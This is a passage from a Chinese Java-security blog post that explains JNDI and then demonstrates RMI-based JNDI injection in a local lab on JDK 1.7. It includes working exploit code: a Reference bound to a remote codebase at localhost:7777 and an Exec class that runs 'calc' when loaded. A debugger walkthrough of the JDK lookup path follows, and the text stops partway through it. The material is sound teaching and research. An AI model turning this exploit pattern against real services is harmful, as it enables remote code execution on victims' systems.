<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <link rel="manifest" href="/images/manifest.json">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.zcwww.top","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta property="og:type" content="article">
<meta property="og:title" content="JNDI注入">
<meta property="og:url" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="THIS IS B3c0me">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/u=495265201,1610291925&fm=253&fmt=auto&app=138&f=JPEG.jpeg">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/image-20230826220849732-16930589352152.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230827113855942.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230827114018355.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230827114721328.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230827120217731.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230828110714518.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230828110855248.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230828110956221.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230828111139244.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230828111341988.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230828111810709.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230828112016903.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230828113325061.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230828113440760.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230828113732298.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/image-20230828114009932.png">
<meta property="og:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog/source_posts/JNDI注入/5af4f06abfea4058a733bc2b881c07ed.png#pic_center">
<meta property="article:published_time" content="2023-08-26T13:27:50.000Z">
<meta property="article:modified_time" content="2023-10-12T00:52:03.949Z">
<meta property="article:author" content="B3c0me">
<meta property="article:tag" content="学习 生活 分享 交流">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/u=495265201,1610291925&fm=253&fmt=auto&app=138&f=JPEG.jpeg">

<link rel="canonical" href="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>JNDI注入 | THIS IS B3c0me</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">THIS IS B3c0me</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">记录生活中的点点滴滴</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

  <a href="https://github.com/zcwww6" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://www.zcwww.top/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/head.jpg">
      <meta itemprop="name" content="B3c0me">
      <meta itemprop="description" content="去爱 去工作">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="THIS IS B3c0me">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          JNDI注入
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-08-26 21:27:50" itemprop="dateCreated datePublished" datetime="2023-08-26T21:27:50+08:00">2023-08-26</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-10-12 08:52:03" itemprop="dateModified" datetime="2023-10-12T08:52:03+08:00">2023-10-12</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Java%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">Java安全</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/u=495265201,1610291925&fm=253&fmt=auto&app=138&f=JPEG.jpeg" alt="img"></p>
<span id="more"></span>

<h1 id="JNDI介绍"><a href="#JNDI介绍" class="headerlink" title="JNDI介绍"></a>JNDI介绍</h1><blockquote>
<p>访问命名和目录服务的API</p>
</blockquote>
<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>JNDI（Java Naming and Directory Interface）是<strong>Java命名和目录接口</strong>的缩写。它是Java平台提供的一个标准API，用于访问各种命名和目录服务。JNDI可以用于在Java应用程序中查找和访问命名资源，如数据库连接、JMS队列、LDAP目录等。</p>
<p>JNDI提供了一种统一的访问不同命名和目录服务的方式，无论这些服务是本地的还是远程的。它抽象出了与底层命名和目录服务的交互细节，使开发人员能够通过统一的API来访问这些服务。</p>
<p>想象一下，你去一个大图书馆找一本书。你可能会去图书管理员那里，告诉他们书的名字，然后他们会帮助你找到这本书。JNDI就类似于这个图书管理员。</p>
<p>在Java程序中，你可能需要连接到数据库、消息队列或其他资源，像连接图书馆的书籍一样。JNDI就是Java平台提供的一个工具，帮助你查找和访问这些资源。</p>
<p>通过使用JNDI，你可以把这些资源的名字和在哪里找到它们的详细信息告诉JNDI，就像告诉图书管理员书名一样。然后，你就可以使用JNDI来查找和访问这些资源，而不用关心底层的细节。</p>
<p>当你需要数据库连接时，你只需告诉JNDI数据库的名字和连接信息，它将会帮助你获取一个连接。当你需要发送消息到某个队列时，也只需告诉JNDI队列的名字和相关信息，它将会帮助你发送消息到正确的队列。</p>
<p>简单来说，JNDI就是一个帮助你查找和访问资源的工具，类似于一个图书馆管理员，让你能够更方便地获取所需的资源。</p>
<p>通过JNDI，开发人员可以直接通过名称来访问和操作资源，而不需要关心底层服务的具体实现细节。JNDI提供了一组用于查找、绑定、解绑、删除等操作的API，使开发人员可以轻松地管理命名和目录服务，并将其集成到Java应用程序中。</p>
<p>JNDI广泛应用于Java企业级应用开发中，特别是在分布式系统中。它可以帮助开发人员统一管理和访问不同的资源，提高应用程序的可扩展性和可重用性。</p>
<p><strong>支持的服务</strong></p>
<ul>
<li><p>RMI (JAVA远程方法调用)</p>
</li>
<li><p>LDAP (轻量级目录访问协议)</p>
</li>
<li><p>CORBA (公共对象请求代理体系结构)</p>
</li>
<li><p>DNS (域名服务)</p>
<p>前三种都支持远程对象调用</p>
</li>
</ul>
<p><strong>支持的数据存储对象</strong></p>
<ul>
<li><p>Java序列化对象</p>
</li>
<li><p>JNDI Reference引用</p>
</li>
<li><p>Marshalled对象</p>
</li>
<li><p>RMI远程对象</p>
</li>
<li><p>CORBA 对象</p>
</li>
</ul>
<h2 id="优点"><a href="#优点" class="headerlink" title="优点"></a>优点</h2><ul>
<li>包含了<strong>大量</strong>的命名和目录服务，使用通用接口来访问不同种类的服务；</li>
<li>可以<strong>同时</strong>连接到多个命名或目录服务上；</li>
<li>建立起逻辑关联，允许把名称同Java对象或资源关联起来，而不必知道对象或资源的物理ID。</li>
</ul>
<h2 id="组件"><a href="#组件" class="headerlink" title="组件"></a>组件</h2><ul>
<li><strong>Javax.naming</strong>：包含了访问命名服务的类和接口。例如，它定义了Context接口，这是命名服务执行查询的入口。</li>
<li><strong>Javax.naming.directory</strong>：对命名包的扩充，提供了访问目录服务的类和接口。例如，它为属性增加了新的类，提供了表示目录上下文的DirContext接口，定义了检查和更新目录对象的属性的方法。</li>
<li><strong>Javax.naming.event</strong>：提供了对访问命名和目录服务时的事件通知的支持。例如，定义了NamingEvent类，这个类用来表示命名目录服务产生的事件，定义了侦听NamingEvents的NamingListener接口。</li>
<li><strong>Javax.naming.ldap</strong>：这个包提供了对LDAP 版本3扩充的操作和控制的支持，通用包javax.naming.directory没有包含这些操作和控制。</li>
<li><strong>Javax.naming.spi</strong>：这个包提供了一个方法，通过javax.naming和有关包动态增加对访问命名和目录服务的支持。这个包是为有兴趣创建服务提供者的开发者提供的。</li>
</ul>
<h1 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h1><h2 id="RMI攻击实现"><a href="#RMI攻击实现" class="headerlink" title="RMI攻击实现"></a>RMI攻击实现</h2><h3 id="注入原理"><a href="#注入原理" class="headerlink" title="注入原理"></a>注入原理</h3><p>在JNDI服务中，RMI服务端除了直接绑定远程对象之外，还可以通过References类来绑定一个外部的远程对象（当前名称目录系统之外的对象）。绑定了Reference之后，服务端会先通过Referenceable.getReference()获取绑定对象的引用，并且在目录中保存。当客户端在lookup()查找这个远程对象时，客户端会获取相应的object factory，最终通过factory类将reference转换为具体的对象实例。</p>
<h3 id="影响版本"><a href="#影响版本" class="headerlink" title="影响版本"></a>影响版本</h3><p>JDK &lt;= 8u121</p>
<p>在8u121之后<code>com.sun.jndi.rmi.object.trustURLCodebase</code>、<code>com.sun.jndi.cosnaming.object.trustURLCodebase</code> 等属性的默认值变为false，就不能再利用了</p>
<p><strong>以下实验的使用jdk1.7</strong></p>
<h3 id="JNDI和RMI结合使用"><a href="#JNDI和RMI结合使用" class="headerlink" title="JNDI和RMI结合使用"></a>JNDI和RMI结合使用</h3><ul>
<li><p>RMI服务端：RMIServer.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.rmi.AlreadyBoundException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.LocateRegistry;</span><br><span class="line"><span class="keyword">import</span> java.rmi.registry.Registry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">RMIServer</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> RemoteException, AlreadyBoundException </span>&#123;</span><br><span class="line">        IRemoteObj remoteObj = <span class="keyword">new</span> RemoteObjImpl();</span><br><span class="line">        Registry r = LocateRegistry.createRegistry(<span class="number">1099</span>);</span><br><span class="line">        r.bind(<span class="string">&quot;remoteObj&quot;</span>,remoteObj);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
<li><p>远程接口：IRemoteObj.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.rmi.Remote;</span><br><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">interface</span> <span class="title">IRemoteObj</span> <span class="keyword">extends</span> <span class="title">Remote</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> String <span class="title">sayHello</span><span class="params">(String keywords)</span> <span class="keyword">throws</span> RemoteException</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
<li><p>实现接口的远程对象:RemoteObjImpl.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.rmi.RemoteException;</span><br><span class="line"><span class="keyword">import</span> java.rmi.server.UnicastRemoteObject;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">RemoteObjImpl</span> <span class="keyword">extends</span> <span class="title">UnicastRemoteObject</span> <span class="keyword">implements</span> <span class="title">IRemoteObj</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">RemoteObjImpl</span><span class="params">()</span> <span class="keyword">throws</span> RemoteException</span>&#123;</span><br><span class="line">        <span class="keyword">super</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> String <span class="title">sayHello</span><span class="params">(String keywords)</span></span>&#123;</span><br><span class="line">        String upKeywords = keywords.toUpperCase();</span><br><span class="line">        System.out.println(upKeywords);</span><br><span class="line">        <span class="keyword">return</span> upKeywords;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
<li><p>JNDI服务端：JNDIRMIServer.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.naming.InitialContext;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">JNDIRMIServer</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span><span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        InitialContext initialContext = <span class="keyword">new</span> InitialContext();</span><br><span class="line">        initialContext.rebind(<span class="string">&quot;rmi://127.0.0.1:1099/remoteObj&quot;</span>,<span class="keyword">new</span> RemoteObjImpl());</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
<li><p>JNDI客户端：JNDIRMIClient.java</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.naming.InitialContext;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">JNDIRMIClient</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        InitialContext initialContext = <span class="keyword">new</span> InitialContext();</span><br><span class="line">        IRemoteObj remoteObj = (IRemoteObj)initialContext.lookup(<span class="string">&quot;rmi://127.0.0.1:1099/remoteObj&quot;</span>);</span><br><span class="line">        System.out.println(remoteObj.sayHello(<span class="string">&quot;hello&quot;</span>));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里的InitialContext()是构建一个初始上下文。通俗点来讲就是获取初始目录环境。</p>
<p>当开启RMI服务和JNDI服务后，此时JNDI客户端便可成功发出请求</p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/image-20230826220849732-16930589352152.png"></p>
</li>
</ul>
<h3 id="RMI攻击"><a href="#RMI攻击" class="headerlink" title="RMI攻击"></a>RMI攻击</h3><p>通过上例可以看出JNDI可以和RMI结合使用，而攻击就要通过<strong>References</strong>类来绑定一个外部的<strong>远程对象</strong>的方式进行了。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Reference(String className, RefAddr addr, String factory, String factoryLocation)        </span><br></pre></td></tr></table></figure>

<ul>
<li><code>className</code> ： 远程加载时所使用的类名</li>
<li><code>classFactory </code>： 加载的<code>class</code>中需要实例化类的名称</li>
<li><code>classFactoryLocation</code> ： 提供<code>classes</code>数据的地址可以是<code>file/ftp/http</code>协议</li>
</ul>
<p><strong>开启远程服务</strong>：在该目录下放一个Exec.class,进行远程调用</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Exec</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">Exec</span><span class="params">()</span> <span class="keyword">throws</span> IOException </span>&#123;</span><br><span class="line">        Runtime.getRuntime().exec(<span class="string">&quot;calc&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>之后<strong>修改JNDIRMIServer</strong>，通过Reference绑定启动的远程服务对象</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.naming.InitialContext;</span><br><span class="line"><span class="keyword">import</span> javax.naming.Reference;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">JNDIRMIServer</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span><span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        InitialContext initialContext = <span class="keyword">new</span> InitialContext();</span><br><span class="line">        <span class="comment">//initialContext.rebind(&quot;rmi://127.0.0.1:1099/remoteObj&quot;,new RemoteObjImpl());</span></span><br><span class="line"></span><br><span class="line">        Reference refobj = <span class="keyword">new</span> Reference(<span class="string">&quot;Exec&quot;</span>, <span class="string">&quot;Exec&quot;</span>, <span class="string">&quot;http://localhost:7777/&quot;</span>);</span><br><span class="line">        initialContext.rebind(<span class="string">&quot;rmi://127.0.0.1:1099/remoteObj&quot;</span>,refobj);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>将项目目录下的Exec.java编译成字节码文件</p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230827113855942.png" alt="image-20230827113855942"></p>
<p><strong>重新启动RMI</strong>，<strong>JNDIServer</strong>后，通过客户端JNDIClient成功执行恶意字节码文件(这里是本地测试的也可以修改<a target="_blank" rel="noopener" href="http://localhost:7777/%EF%BC%8C%E8%BF%9B%E8%A1%8C%E8%BF%9C%E7%A8%8B%E8%B0%83%E7%94%A8">http://localhost:7777/，进行远程调用</a></p>
<p>Exec类被成功调用执行</p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230827114018355.png" alt="image-20230827114018355"></p>
<h3 id="攻击流程分析"><a href="#攻击流程分析" class="headerlink" title="攻击流程分析"></a>攻击流程分析</h3><p>跟进<code>lookup</code>，name就是我们传入的<code>rmi://127.0.0.1:1099/remoteObj</code></p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230827114721328.png" alt="image-20230827114721328"></p>
<p>这里又调用了<code>lookup</code>，继续跟进，这里调用了var3的lookup，而var3的是<code>RegistryContext</code>，所以虽然我们通过JNDI的方式进行的调用，但最后还是会调用到RMI的流程中，所以这也就是JNDI能结合RMI使用的原因是<strong>JNDI的每个服务对应一个Context协议</strong>，而RMI对应的协议就是RegistryContext</p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230827120217731.png" alt="image-20230827120217731"></p>
<p>继续跟进<code>lookup</code>，还是会调用lookup，但调用后var2是ReferenceWrapper类型，而在<code>JNDIRMIServer</code>中实例化的是Reference</p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230828110714518.png" alt="image-20230828110714518"></p>
<p>分析一下这里的原因</p>
<p>跟进<code>rebind</code>，远程服务绑定时绑定的是<code>Reference</code>,但当客户端调用时变成了<code>ReferenceWrapper</code>，所以一定是在<code>Reference</code>绑定后进行了一些操作</p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230828110855248.png" alt="image-20230828110855248"></p>
<p>继续跟进<code>rebind</code></p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230828110956221.png" alt="image-20230828110956221"></p>
<p>这里用<code>var4</code>调用了<code>rebind</code>,继续跟进</p>
<p>跟进后发现有一个<code>encode</code>操作</p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230828111139244.png" alt="image-20230828111139244"></p>
<p>继续跟进<code>encode</code></p>
<p>发现：如果<code>var1</code>是<code>Reference</code>类型或者<code>Referenceable</code>类型，则会返回一个<code>ReferenceWrapper</code>类型的<code>var1</code></p>
<p>所以上个步骤的<code>var2</code>是<code>ReferenceWrapper</code>类型的原因也就在这里</p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230828111341988.png" alt="image-20230828111341988"></p>
<p>回到刚才的<code>lookup</code>方法，由于刚才的<code>rebind</code>中进行了encode，所以这里对应的会返回一个decode的操作</p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230828111810709.png" alt="image-20230828111810709"></p>
<p>跟进后，发现了<code>getReference()</code>，在注入原理中提到过他可以获取绑定对象的引用，所以var3就变为了我们绑定的Reference对象</p>
<p><img src="/2023/08/26/JNDI%E6%B3%A8%E5%85%A5/Blog\source_posts\JNDI注入\image-20230828112016903.png" alt="image-20230828112016903"></p>
<p>之后就调用了<code>NamingManager.getObjectInstance</code>，在319行会调用<code>getObjectFactoryFromReference</code>，从引用中获取对象工厂</p>
